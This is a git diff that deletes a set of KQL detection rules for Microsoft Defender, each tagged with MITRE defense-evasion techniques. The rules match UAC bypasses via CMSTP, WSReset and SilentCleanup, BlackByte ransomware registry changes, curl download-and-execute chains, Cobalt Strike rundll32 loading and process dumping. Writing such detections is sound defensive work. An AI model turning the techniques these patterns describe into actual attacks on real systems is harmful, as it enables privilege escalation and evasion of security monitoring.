--- a/Defense Evasion/Base64_Encoded_PowerShell_Command_Detected.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/01/29
-// Level: high
-// Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
-// Tags: attack.t1027, attack.defense_evasion, attack.t1140, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "::FromBase64String("
\ No newline at end of file
diff --git a/Defense Evasion/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql b/Defense Evasion/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql
deleted file mode 100644
index 75e530fc..00000000
--- a/Defense Evasion/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jimmy Bayne (@bohops)
-// Date: 2024/01/02
-// Level: medium
-// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-- " and ProcessCommandLine contains "collect") and (FolderPath endswith "\\dotnet-trace.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-trace.dll")
\ No newline at end of file
diff --git a/Defense Evasion/Blackbyte_Ransomware_Registry.kql b/Defense Evasion/Blackbyte_Ransomware_Registry.kql
deleted file mode 100644
index c3f67c1d..00000000
--- a/Defense Evasion/Blackbyte_Ransomware_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/24
-// Level: high
-// Description: BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\FileSystem\\LongPathsEnabled"))
\ No newline at end of file
diff --git a/Defense Evasion/Bypass_UAC_Using_DelegateExecute.kql b/Defense Evasion/Bypass_UAC_Using_DelegateExecute.kql
deleted file mode 100644
index 76abcf3f..00000000
--- a/Defense Evasion/Bypass_UAC_Using_DelegateExecute.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: high
-// Description: Bypasses User Account Control using a fileless method
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/Defense Evasion/Bypass_UAC_Using_SilentCleanup_Task.kql b/Defense Evasion/Bypass_UAC_Using_SilentCleanup_Task.kql
deleted file mode 100644
index 59a7340a..00000000
--- a/Defense Evasion/Bypass_UAC_Using_SilentCleanup_Task.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nextron Systems
-// Date: 2022/01/06
-// Level: high
-// Description: Detects the setting of the environement variable "windir" to a non default value.
-Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
-The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Environment\\windir" and (not(RegistryValueData =~ "%SystemRoot%"))
\ No newline at end of file
diff --git a/Defense Evasion/Bypass_UAC_via_CMSTP.kql b/Defense Evasion/Bypass_UAC_via_CMSTP.kql
deleted file mode 100644
index 8ff3d7ea..00000000
--- a/Defense Evasion/Bypass_UAC_via_CMSTP.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002, attack.t1218.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "-s" or ProcessCommandLine contains "/au" or ProcessCommandLine contains "-au" or ProcessCommandLine contains "/ni" or ProcessCommandLine contains "-ni") and (FolderPath endswith "\\cmstp.exe" or ProcessVersionInfoOriginalFileName =~ "CMSTP.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Bypass_UAC_via_WSReset.exe.kql b/Defense Evasion/Bypass_UAC_via_WSReset.exe.kql
deleted file mode 100644
index 3524a28c..00000000
--- a/Defense Evasion/Bypass_UAC_via_WSReset.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth
-// Date: 2019/10/24
-// Level: high
-// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\wsreset.exe" and (not((FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/C#_IL_Code_Compilation_Via_Ilasm.EXE.kql b/Defense Evasion/C#_IL_Code_Compilation_Via_Ilasm.EXE.kql
deleted file mode 100644
index 72baadb5..00000000
--- a/Defense Evasion/C#_IL_Code_Compilation_Via_Ilasm.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/05/07
-// Level: medium
-// Description: Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /dll" or ProcessCommandLine contains " /exe") and (FolderPath endswith "\\ilasm.exe" or ProcessVersionInfoOriginalFileName =~ "ilasm.exe")
\ No newline at end of file
diff --git a/Defense Evasion/CMSTP_Execution_Process_Creation.kql b/Defense Evasion/CMSTP_Execution_Process_Creation.kql
deleted file mode 100644
index 32254f8e..00000000
--- a/Defense Evasion/CMSTP_Execution_Process_Creation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman
-// Date: 2018/07/16
-// Level: high
-// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\cmstp.exe"
\ No newline at end of file
diff --git a/Defense Evasion/CMSTP_Execution_Registry_Event.kql b/Defense Evasion/CMSTP_Execution_Registry_Event.kql
deleted file mode 100644
index fc5cd431..00000000
--- a/Defense Evasion/CMSTP_Execution_Registry_Event.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman
-// Date: 2018/07/16
-// Level: high
-// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey contains "\\cmmgr32.exe"
\ No newline at end of file
diff --git a/Defense Evasion/CMSTP_UAC_Bypass_via_COM_Object_Access.kql b/Defense Evasion/CMSTP_UAC_Bypass_via_COM_Object_Access.kql
deleted file mode 100644
index b950101f..00000000
--- a/Defense Evasion/CMSTP_UAC_Bypass_via_COM_Object_Access.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman, Christian Burkard (Nextron Systems)
-// Date: 2019/07/31
-// Level: high
-// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Defense Evasion/COM_Object_Execution_via_Xwizard.EXE.kql b/Defense Evasion/COM_Object_Execution_via_Xwizard.EXE.kql
deleted file mode 100644
index a079b713..00000000
--- a/Defense Evasion/COM_Object_Execution_via_Xwizard.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/07
-// Level: medium
-// Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument.
-This utility can be abused in order to run custom COM object created in the registry.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine =~ "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}") and (FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe")) or ((ProcessCommandLine =~ "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}") and (not((FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Certificate_Exported_Via_Certutil.EXE.kql b/Defense Evasion/Certificate_Exported_Via_Certutil.EXE.kql
deleted file mode 100644
index 8a079db6..00000000
--- a/Defense Evasion/Certificate_Exported_Via_Certutil.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: medium
-// Description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-exportPFX " or ProcessCommandLine contains "/exportPFX ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Change_User_Account_Associated_with_the_FAX_Service.kql b/Defense Evasion/Change_User_Account_Associated_with_the_FAX_Service.kql
deleted file mode 100644
index ba7ae505..00000000
--- a/Defense Evasion/Change_User_Account_Associated_with_the_FAX_Service.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/17
-// Level: high
-// Description: Detect change of the user account associated with the FAX service to avoid the escalation problem.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\Fax\\ObjectName" and (not(RegistryValueData contains "NetworkService"))
\ No newline at end of file
diff --git a/Defense Evasion/Change_Winevt_Channel_Access_Permission_Via_Registry.kql b/Defense Evasion/Change_Winevt_Channel_Access_Permission_Via_Registry.kql
deleted file mode 100644
index 948e8aaf..00000000
--- a/Defense Evasion/Change_Winevt_Channel_Access_Permission_Via_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/09/17
-// Level: high
-// Description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceRegistryEvents
-| where ((RegistryValueData contains "(A;;0x1;;;LA)" or RegistryValueData contains "(A;;0x1;;;SY)" or RegistryValueData contains "(A;;0x5;;;BA)") and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels" and RegistryKey endswith "\\ChannelAccess") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Change_the_Fax_Dll.kql b/Defense Evasion/Change_the_Fax_Dll.kql
deleted file mode 100644
index f42ea9fd..00000000
--- a/Defense Evasion/Change_the_Fax_Dll.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/17
-// Level: high
-// Description: Detect possible persistence using Fax DLL load when service restart
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Microsoft\\Fax\\Device Providers" and RegistryKey contains "\\ImageName") and (not(RegistryValueData =~ "%systemroot%\\system32\\fxst30.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/ClickOnce_Trust_Prompt_Tampering.kql b/Defense Evasion/ClickOnce_Trust_Prompt_Tampering.kql
deleted file mode 100644
index 37d93606..00000000
--- a/Defense Evasion/ClickOnce_Trust_Prompt_Tampering.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @SerkinValery, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/12
-// Level: medium
-// Description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "Enabled" and RegistryKey contains "\\SOFTWARE\\MICROSOFT\\.NETFramework\\Security\\TrustManager\\PromptingLevel" and (RegistryKey endswith "\\Internet" or RegistryKey endswith "\\LocalIntranet" or RegistryKey endswith "\\MyComputer" or RegistryKey endswith "\\TrustedSites" or RegistryKey endswith "\\UntrustedSites")
\ No newline at end of file
diff --git a/Defense Evasion/CobaltStrike_Load_by_Rundll32.kql b/Defense Evasion/CobaltStrike_Load_by_Rundll32.kql
deleted file mode 100644
index fe5a03e5..00000000
--- a/Defense Evasion/CobaltStrike_Load_by_Rundll32.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Wojciech Lesicki
-// Date: 2021/06/01
-// Level: high
-// Description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".dll" and (ProcessCommandLine endswith " StartW" or ProcessCommandLine endswith ",StartW")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or (ProcessCommandLine contains "rundll32.exe" or ProcessCommandLine contains "rundll32 "))
\ No newline at end of file
diff --git a/Defense Evasion/CodePage_Modification_Via_MODE.COM_To_Russian_Language.kql b/Defense Evasion/CodePage_Modification_Via_MODE.COM_To_Russian_Language.kql
deleted file mode 100644
index fe701214..00000000
--- a/Defense Evasion/CodePage_Modification_Via_MODE.COM_To_Russian_Language.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2024/01/17
-// Level: medium
-// Description: Detects a CodePage modification using the "mode.com" utility to Russian language.
-This behavior has been used by threat actors behind Dharma ransomware.
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (ProcessCommandLine endswith "=1251" or ProcessCommandLine endswith "=866")) and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM")
\ No newline at end of file
diff --git a/Defense Evasion/Code_Execution_via_Pcwutl.dll.kql b/Defense Evasion/Code_Execution_via_Pcwutl.dll.kql
deleted file mode 100644
index c597db84..00000000
--- a/Defense Evasion/Code_Execution_via_Pcwutl.dll.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/05
-// Level: medium
-// Description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "pcwutl" and ProcessCommandLine contains "LaunchApplication") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Control_Panel_Items.kql b/Defense Evasion/Control_Panel_Items.kql
deleted file mode 100644
index de98b896..00000000
--- a/Defense Evasion/Control_Panel_Items.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
-// Date: 2020/06/22
-// Level: high
-// Description: Detects the malicious use of a control panel item
-// Tags: attack.execution, attack.defense_evasion, attack.t1218.002, attack.persistence, attack.t1546
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|")))))
\ No newline at end of file
diff --git a/Defense Evasion/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql b/Defense Evasion/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql
deleted file mode 100644
index 1f4c9f72..00000000
--- a/Defense Evasion/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: medium
-// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "ConvertTo-SecureString" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/CreateDump_Process_Dump.kql b/Defense Evasion/CreateDump_Process_Dump.kql
deleted file mode 100644
index d2af686e..00000000
--- a/Defense Evasion/CreateDump_Process_Dump.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/04
-// Level: high
-// Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -u " or ProcessCommandLine contains " --full " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " --name " or ProcessCommandLine contains ".dmp ") and (FolderPath endswith "\\createdump.exe" or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR")
\ No newline at end of file
diff --git a/Defense Evasion/Created_Files_by_Microsoft_Sync_Center.kql b/Defense Evasion/Created_Files_by_Microsoft_Sync_Center.kql
deleted file mode 100644
index ef6299fb..00000000
--- a/Defense Evasion/Created_Files_by_Microsoft_Sync_Center.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/04/28
-// Level: medium
-// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
-// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/Defense Evasion/Creation_Of_Non-Existent_System_DLL.kql b/Defense Evasion/Creation_Of_Non-Existent_System_DLL.kql
deleted file mode 100644
index 973ed62c..00000000
--- a/Defense Evasion/Creation_Of_Non-Existent_System_DLL.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), fornotes
-// Date: 2022/12/01
-// Level: medium
-// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
-Usually this technique is used to achieve DLL hijacking.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll"
\ No newline at end of file
diff --git a/Defense Evasion/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql b/Defense Evasion/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql
deleted file mode 100644
index f9303a14..00000000
--- a/Defense Evasion/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/09
-// Level: high
-// Description: Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking
-// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath contains "\\System32\\" or FolderPath contains "\\SysWOW64\\" or FolderPath contains "\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql b/Defense Evasion/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql
deleted file mode 100644
index 544ae6eb..00000000
--- a/Defense Evasion/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2019/02/11
-// Level: high
-// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
-// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense_evasion, attack.t1218.005, attack.t1027.004
-DeviceProcessEvents
-| where (FolderPath endswith "\\csc.exe" or ProcessVersionInfoOriginalFileName =~ "csc.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "-Encoded " or InitiatingProcessCommandLine contains "FromBase64String") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) or (InitiatingProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$" or (InitiatingProcessCommandLine contains ":\\PerfLogs\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Pictures\\"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or InitiatingProcessFolderPath =~ "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/Defense Evasion/Curl_Download_And_Execute_Combination.kql b/Defense Evasion/Curl_Download_And_Execute_Combination.kql
deleted file mode 100644
index a0dd325c..00000000
--- a/Defense Evasion/Curl_Download_And_Execute_Combination.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/01/13
-// Level: high
-// Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
-// Tags: attack.defense_evasion, attack.t1218, attack.command_and_control, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o" and ProcessCommandLine contains "&") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ")
\ No newline at end of file
diff --git a/Defense Evasion/Custom_File_Open_Handler_Executes_PowerShell.kql b/Defense Evasion/Custom_File_Open_Handler_Executes_PowerShell.kql
deleted file mode 100644
index 40bbb2ff..00000000
--- a/Defense Evasion/Custom_File_Open_Handler_Executes_PowerShell.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: CD_R0M_
-// Date: 2022/06/11
-// Level: high
-// Description: Detects the abuse of custom file open handler, executing powershell
-// Tags: attack.defense_evasion, attack.t1202
-DeviceRegistryEvents
-| where (RegistryValueData contains "powershell" and RegistryValueData contains "-command") and RegistryKey contains "shell\\open\\command"
\ No newline at end of file
diff --git a/Defense Evasion/DHCP_Callout_DLL_Installation.kql b/Defense Evasion/DHCP_Callout_DLL_Installation.kql
deleted file mode 100644
index 67ddb9cc..00000000
--- a/Defense Evasion/DHCP_Callout_DLL_Installation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Dimitrios Slamaris
-// Date: 2017/05/15
-// Level: high
-// Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
-// Tags: attack.defense_evasion, attack.t1574.002, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutDlls" or RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutEnabled"
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Execution_Via_Register-cimprovider.exe.kql b/Defense Evasion/DLL_Execution_Via_Register-cimprovider.exe.kql
deleted file mode 100644
index 580b5c06..00000000
--- a/Defense Evasion/DLL_Execution_Via_Register-cimprovider.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ivan Dyachkov, Yulia Fomina, oscd.community
-// Date: 2020/10/07
-// Level: medium
-// Description: Detects using register-cimprovider.exe to execute arbitrary dll file.
-// Tags: attack.defense_evasion, attack.t1574
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-path" and ProcessCommandLine contains "dll") and FolderPath endswith "\\register-cimprovider.exe"
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Execution_via_Rasautou.exe.kql b/Defense Evasion/DLL_Execution_via_Rasautou.exe.kql
deleted file mode 100644
index 2ffe336e..00000000
--- a/Defense Evasion/DLL_Execution_via_Rasautou.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/09
-// Level: medium
